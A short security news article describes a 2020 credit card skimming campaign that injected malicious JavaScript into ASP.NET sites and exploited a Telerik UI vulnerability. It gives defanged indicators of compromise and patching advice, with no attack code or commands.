Credit Card Skimmer Going After ASP.NET Websites
A campaign spotted by computer security researchers in April was stealing credentials for e-commerce websites. Researchers managed to identify the credit skimming campaign, aimed at a specific target - ASP .NET-based websites running on the Microsoft Internet Information (IIS) servers. The researchers managed to uncover the campaign which was compromising at least a dozen sites, ranging from sports organizations, community and health associations, and a credit union. The method used was a malicious code injected into existing JavaScript libraries on the websites.
The campaign, exposed by Malwarebytes, appears to be exploiting an older version of ASP.NET, specifically version 4.0.30319, which is no longer supported officially due to multiple vulnerabilities. The skimming campaign began somewhere around April 2020, with the first domain being hivnd[.]net, with 33.220.60[.]108 registered by a threat actor that uses a ProtonMail address.
In most cases, attackers inject the skimming code into the compromised JavaScript library, but in some cases, it is loaded remotely; in this case, the attackers loaded the skimmer from a remote domain – thxrq[.]com.
What are Credit Card Skimmers?
Credit card skimmers are malware that reads and records credit card details during legitimate transactions, used by threat actors. The attackers behind the campaigns usually put up the details for sale on dark web forums to make more money from these intrusions. Point of sale transactions, such as self-checkout or gas station pumps, is one of the main targets of these attacks, but any type of web commerce transaction using a credit card can be vulnerable.
Although ASP.NET isn't as popular as PHP, it is still used in personal blogs and small businesses. Many websites use it for shopping cart functionality. These shopping portals are targeted by the campaign, showing that any website can fall victim to attackers. In some cases, some sites get hacked and injected without being the intended targets.
In most of these attacks, the threat actors used different routes to look for credit card data and passwords. Some of that functionality was poorly implemented, which made it harder for researchers to pinpoint during analysis. Once the researchers managed to identify the campaign and the affected sites, they contacted the victims, hoping they would recognize the breach and take actions to harden their security.
Recent information on the attacks on the .NET sites showed that a known vulnerability (CVE-2017-9248) for the Telerik UI for ASP.NET was being exploited. The attackers would upload .aspx web shells for remote code execution. The Telerik page offers advice and patches the owners can apply, but they should also keep their version of ASP.NET up to date.